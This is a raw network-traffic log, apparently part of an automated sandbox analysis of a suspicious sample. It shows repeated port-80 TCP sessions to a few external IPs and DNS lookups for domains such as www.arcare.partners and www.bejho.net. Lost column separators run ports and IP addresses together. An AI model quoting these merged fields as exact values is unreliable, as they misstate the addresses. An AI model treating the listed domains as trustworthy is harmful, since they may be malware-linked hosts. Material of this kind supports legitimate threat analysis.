                                                                                Nov 17, 2024 08:37:47.409506083 CET5003680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:47.414882898 CET80500363.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:48.045371056 CET80500363.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:48.046134949 CET80500363.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:48.046200037 CET5003680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:48.048926115 CET5003680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:48.054299116 CET80500363.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:53.124197006 CET5003780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:53.129344940 CET80500373.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:53.129678965 CET5003780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:53.140146971 CET5003780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:53.145266056 CET80500373.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:54.657727957 CET5003780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:54.820127010 CET80500373.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:54.820281982 CET5003780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:54.820620060 CET80500373.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:55.673382044 CET5003880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:55.688497066 CET80500383.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:55.688574076 CET5003880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:55.699189901 CET5003880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:55.704204082 CET80500383.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:56.327272892 CET80500383.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:56.327332020 CET5003880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:57.202054977 CET5003880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:57.207051039 CET80500383.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.220874071 CET5003980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:58.419891119 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.420011044 CET5003980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:58.434643984 CET5003980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:58.439575911 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439636946 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439682961 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439709902 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439728975 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439739943 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439760923 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439790964 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439801931 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:59.051446915 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:59.057631016 CET5003980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:59.936558962 CET5003980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:59.942641020 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:00.955023050 CET5004080192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:00.960541964 CET80500403.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:00.964822054 CET5004080192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:00.968388081 CET5004080192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:00.973799944 CET80500403.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:01.586008072 CET80500403.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:01.586532116 CET80500403.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:01.586729050 CET5004080192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:01.589499950 CET5004080192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:01.594729900 CET80500403.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:06.611089945 CET5004180192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:06.616627932 CET80500413.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:06.625507116 CET5004180192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:06.633554935 CET5004180192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:06.639100075 CET80500413.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:08.139589071 CET5004180192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:08.145668030 CET80500413.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:08.145729065 CET5004180192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:09.165513992 CET5004280192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:09.171432972 CET80500423.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:09.171642065 CET5004280192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:09.183274984 CET5004280192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:09.188738108 CET80500423.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:09.809545040 CET80500423.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:09.809607983 CET5004280192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:10.689589024 CET5004280192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:10.695079088 CET80500423.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:11.709403038 CET5004380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:11.725661993 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:11.725738049 CET5004380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:11.738184929 CET5004380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:11.743272066 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:11.743351936 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:11.743464947 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:11.743495941 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:11.743522882 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:11.743550062 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:11.743577003 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:11.743603945 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:11.743630886 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:12.368557930 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:12.368619919 CET5004380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:13.249155045 CET5004380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:13.254189968 CET80500433.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:14.268440008 CET5004480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:14.273789883 CET80500443.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:14.273893118 CET5004480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:14.281449080 CET5004480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:14.286724091 CET80500443.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:14.909862041 CET80500443.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:14.910928965 CET80500443.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:14.915983915 CET5004480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:14.915983915 CET5004480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:14.921668053 CET80500443.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:19.962610006 CET5004580192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:19.967538118 CET8050045172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:19.967638016 CET5004580192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:19.984545946 CET5004580192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:19.989486933 CET8050045172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:21.128840923 CET8050045172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:21.128887892 CET8050045172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:21.128973007 CET8050045172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:21.128978968 CET5004580192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:21.129053116 CET8050045172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:21.129084110 CET8050045172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:21.129113913 CET8050045172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:21.129127979 CET5004580192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:21.129208088 CET8050045172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:21.129249096 CET5004580192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:21.129308939 CET5004580192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:21.499094963 CET5004580192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:22.517873049 CET5004680192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:22.523333073 CET8050046172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:22.523427010 CET5004680192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:22.534073114 CET5004680192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:22.539268017 CET8050046172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:23.500629902 CET8050046172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:23.500679016 CET8050046172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:23.500718117 CET8050046172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:23.500997066 CET5004680192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:23.501382113 CET8050046172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:23.501569033 CET5004680192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:23.502506971 CET8050046172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:23.547678947 CET5004680192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:23.623739958 CET8050046172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:23.631655931 CET5004680192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:24.046021938 CET5004680192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:25.065692902 CET5004780192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:25.071124077 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:25.073654890 CET5004780192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:25.085782051 CET5004780192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:25.091579914 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:25.091623068 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:25.091651917 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:25.091680050 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:25.091706991 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:25.091749907 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:25.091778040 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:25.091831923 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:25.091860056 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:26.047517061 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:26.047569036 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:26.047609091 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:26.047632933 CET5004780192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:26.047707081 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:26.047851086 CET5004780192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:26.049510002 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:26.141524076 CET5004780192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:26.171433926 CET8050047172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:26.171530962 CET5004780192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:26.592853069 CET5004780192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:27.612083912 CET5004880192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:27.618259907 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:27.621779919 CET5004880192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:27.633822918 CET5004880192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:27.639848948 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:28.976594925 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:28.976656914 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:28.976722956 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:28.976756096 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:28.976794004 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:28.976823092 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:28.976984024 CET5004880192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:28.976984024 CET5004880192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:28.978673935 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:29.033906937 CET5004880192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:29.099416018 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:29.101737022 CET5004880192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:29.105648994 CET5004880192.168.2.4172.217.18.19
                                                                                Nov 17, 2024 08:38:29.111155987 CET8050048172.217.18.19192.168.2.4
                                                                                Nov 17, 2024 08:38:34.200124025 CET5004980192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:34.205483913 CET805004913.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:34.205560923 CET5004980192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:34.218767881 CET5004980192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:34.223701000 CET805004913.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:34.901177883 CET805004913.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:34.901319027 CET5004980192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:35.733364105 CET5004980192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:35.943077087 CET805004913.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:36.769526958 CET5005080192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:36.774764061 CET805005013.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:36.776447058 CET5005080192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:36.805643082 CET5005080192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:36.811017036 CET805005013.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:37.548696995 CET805005013.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:37.549597979 CET5005080192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:38.311439037 CET5005080192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:38.316741943 CET805005013.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:39.330718040 CET5005180192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:39.336335897 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:39.336604118 CET5005180192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:39.346117020 CET5005180192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:39.351830959 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:39.351872921 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:39.351902008 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:39.351931095 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:39.351958036 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:39.351984978 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:39.352011919 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:39.352037907 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:39.352072001 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:40.010292053 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:40.010481119 CET5005180192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:40.858691931 CET5005180192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:41.170775890 CET5005180192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:41.780133009 CET5005180192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:41.781861067 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:41.781903982 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:41.782110929 CET5005180192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:41.877393961 CET5005280192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:41.995812893 CET805005113.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:41.995861053 CET805005213.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:41.995958090 CET5005280192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:41.996007919 CET5005180192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:42.011009932 CET5005280192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:42.016324997 CET805005213.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:42.660067081 CET805005213.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:42.694525957 CET805005213.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:42.698493004 CET5005280192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:42.698493004 CET5005280192.168.2.413.248.169.48
                                                                                Nov 17, 2024 08:38:42.703996897 CET805005213.248.169.48192.168.2.4
                                                                                Nov 17, 2024 08:38:47.726389885 CET5005380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:47.731419086 CET80500533.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:47.731491089 CET5005380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:47.742291927 CET5005380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:47.747236013 CET80500533.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:49.249571085 CET5005380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:49.255706072 CET80500533.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:49.255934954 CET5005380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:50.268085957 CET5005480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:50.273746014 CET80500543.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:50.273966074 CET5005480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:50.290318012 CET5005480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:50.295795918 CET80500543.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:50.903358936 CET80500543.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:50.909684896 CET5005480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:51.795821905 CET5005480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:51.800957918 CET80500543.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:52.817542076 CET5005580192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:52.822865009 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:52.829514980 CET5005580192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:52.837548018 CET5005580192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:52.847742081 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:52.847784042 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:52.847811937 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:52.847865105 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:52.847893000 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:52.848817110 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:52.848845959 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:52.848896980 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:52.848925114 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:53.569391012 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:53.573642969 CET5005580192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:54.342835903 CET5005580192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:54.348500013 CET80500553.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:55.361494064 CET5005680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:55.366720915 CET80500563.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:55.369596004 CET5005680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:55.381524086 CET5005680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:55.387293100 CET80500563.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:58.940800905 CET80500563.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:58.942843914 CET80500563.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:38:58.943681955 CET5005680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:58.947875023 CET5005680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:38:58.953036070 CET80500563.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:04.001648903 CET5005780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:04.006612062 CET80500573.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:04.006685019 CET5005780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:04.019942999 CET5005780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:04.024883032 CET80500573.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:05.537341118 CET5005780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:05.543067932 CET80500573.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:05.547348976 CET5005780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:06.548504114 CET5005880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:06.553913116 CET80500583.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:06.553989887 CET5005880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:06.562876940 CET5005880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:06.568166018 CET80500583.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:07.189941883 CET80500583.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:07.190057993 CET5005880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:08.077074051 CET5005880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:08.082278967 CET80500583.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.408811092 CET5005980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:09.414356947 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.415695906 CET5005980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:09.424566031 CET5005980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:09.430092096 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430135012 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430162907 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430190086 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430217981 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430244923 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430272102 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430299997 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430327892 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:10.044704914 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:10.044832945 CET5005980192.168.2.43.33.130.190

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 17, 2024 08:35:53.798593044 CET6221953192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:35:53.825243950 CET53622191.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:36:09.847253084 CET6389453192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:36:09.949516058 CET53638941.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:36:23.454632044 CET6335753192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:36:23.493035078 CET53633571.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:36:36.876545906 CET5289953192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:36:36.885418892 CET53528991.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:36:44.941035032 CET5517053192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:36:44.990912914 CET53551701.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:36:58.423949957 CET6456453192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:36:58.437314034 CET53645641.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:37:11.737153053 CET6504253192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:37:11.959589958 CET53650421.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:37:25.486367941 CET5330753192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:37:25.509663105 CET53533071.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:37:38.877665043 CET6296553192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:37:38.912429094 CET53629651.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:37:53.064559937 CET5642153192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:37:53.121922016 CET53564211.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:38:06.596693039 CET6439353192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:38:06.608757019 CET53643931.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:38:19.924885035 CET5572753192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:38:19.959871054 CET53557271.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:38:34.135893106 CET5967553192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:38:34.175879002 CET53596751.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:38:47.705892086 CET5265853192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:38:47.723491907 CET53526581.1.1.1192.168.2.4
                                                                                Nov 17, 2024 08:39:03.955667973 CET6241253192.168.2.41.1.1.1
                                                                                Nov 17, 2024 08:39:03.996607065 CET53624121.1.1.1192.168.2.4

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Nov 17, 2024 08:35:53.798593044 CET192.168.2.41.1.1.10xc43dStandard query (0)www.arcare.partnersA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:09.847253084 CET192.168.2.41.1.1.10x8a2fStandard query (0)www.bejho.netA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:23.454632044 CET192.168.2.41.1.1.10x9302Standard query (0)www.jagdud.storeA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:36.876545906 CET192.168.2.41.1.1.10x5e96Standard query (0)www.dagoovis.orgA (IP address)IN (0x0001)false
